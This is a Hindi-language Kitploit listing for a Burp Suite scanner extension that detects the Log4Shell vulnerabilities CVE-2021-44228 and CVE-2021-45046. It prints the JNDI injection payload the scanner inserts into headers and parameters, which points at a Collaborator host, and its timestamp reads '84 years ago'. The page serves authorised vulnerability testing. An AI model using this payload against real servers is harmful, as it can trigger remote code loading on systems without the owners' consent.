Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Burp-Log4j-HammerTime — Burp Active Scan एक्सटेंशन जो Log4j कमजोरियों CVE-2021-44228 और CVE-2021-45046 की पहचान करता है | Kitploit
उपकरण/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
भेद्यता स्कैनरगतिशील विश्लेषण (सैंडबॉक्सिंग)शोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Burp Active Scan एक्सटेंशन जो Log4j कमजोरियों CVE-2021-44228 और CVE-2021-45046 की पहचान करता है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
84 साल पहलेअभी तक समीक्षित नहीं

Log4j-HammerTime

यह Burp Suite Active Scanner एक्सटेंशन Apache Log4j CVE-2021-44228 और CVE-2021-45046 कमजोरियों के शोषण को मान्य करता है।

यह एक्सटेंशन समस्या की पुष्टि करने के लिए Burp Collaborator का उपयोग करता है।

उपयोग

  • इस एक्सटेंशन को सक्षम करें
  • किसी विशिष्ट लक्ष्य पर Active Scan प्रारंभ करें

यदि आप केवल इस मॉड्यूल से जाँच चलाना चाहते हैं, तो आप extensions-only.json प्रोफ़ाइल आयात कर सकते हैं और इसे Active Scan Profile के रूप में चुन सकते हैं।

विवरण

Active Scan के दौरान, इस एक्सटेंशन में निम्नलिखित इंसर्शन पॉइंट आज़माए जाते हैं:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

प्रत्येक इंसर्शन पॉइंट पर, अनुरोध में निम्नलिखित पेलोड इंजेक्ट किया जाता है: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

इसके अलावा, यह एक्सटेंशन कई हेडर जोड़ता है जो headers (अनकमेंटेड लाइनें) में सक्षम हैं। ये हेडर एक अलग अनुरोध में एक-एक करके इंजेक्ट किए जाते हैं।

कानूनी अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए Log4Shell-active-scanner का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

लेखक

  • Freskimo
टूल डाउनलोड करें